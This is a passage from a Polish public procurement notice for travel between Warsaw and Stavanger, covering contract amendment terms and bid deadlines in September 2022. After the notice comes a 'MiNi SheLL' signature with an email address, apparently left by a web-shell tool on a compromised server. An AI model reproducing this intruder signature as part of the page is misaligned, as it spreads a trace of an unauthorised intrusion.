korzystniejszej dla Zamawiającego nowej oferty odbycia podróży na trasie Warszawa – Stravanger transportem lotniczym, z jednoczesną rezygnacja z podróży autokarowej na trasie Warszawa – Gdańsk/lub/Kraków. Oferta taka powinna być korzystniejsza dla Zamawiającego pod kątem ceny (tańsza) lub pozwalać na skrócenie łącznego czasu podróży co najmniej o 10 proc. względem planowanego czasu podróży przewidzianego na podstawie najkorzystniejszej oferty, na podstawie której dokonano wyboru Wykonawcy; w przypadku przyjęcia przez Zamawiającego nowej oferty Strony dokonają odpowiednich zmian treści Umowy w drodze aneksu.<br/>2)	konieczności wprowadzenia zmian będących następstwem zmian powszechnie obowiązujących przepisów prawa – w zakresie wynikającym ze zmienionych przepisów prawa;<br/>3)	w razie wystąpienia siły wyższej powodującej konieczność wstrzymania lub zawieszenia wykonywania umowy - zmiana umowy nastąpi poprzez zmianę terminów lub sposobu realizacji umowy odpowiednio o czas trwania siły wyższej lub w sposób zapobiegający skutkom wystąpienia siły wyższej. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-09-12 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę składa się, pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. 20. Sposób złożenia oferty, w tym zaszyfrowania oferty opisany został w „Instrukcji użytkownika”, dostępnej na stronie: https://miniportal.uzp.gov.pl/.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-09-12 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-10-12</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com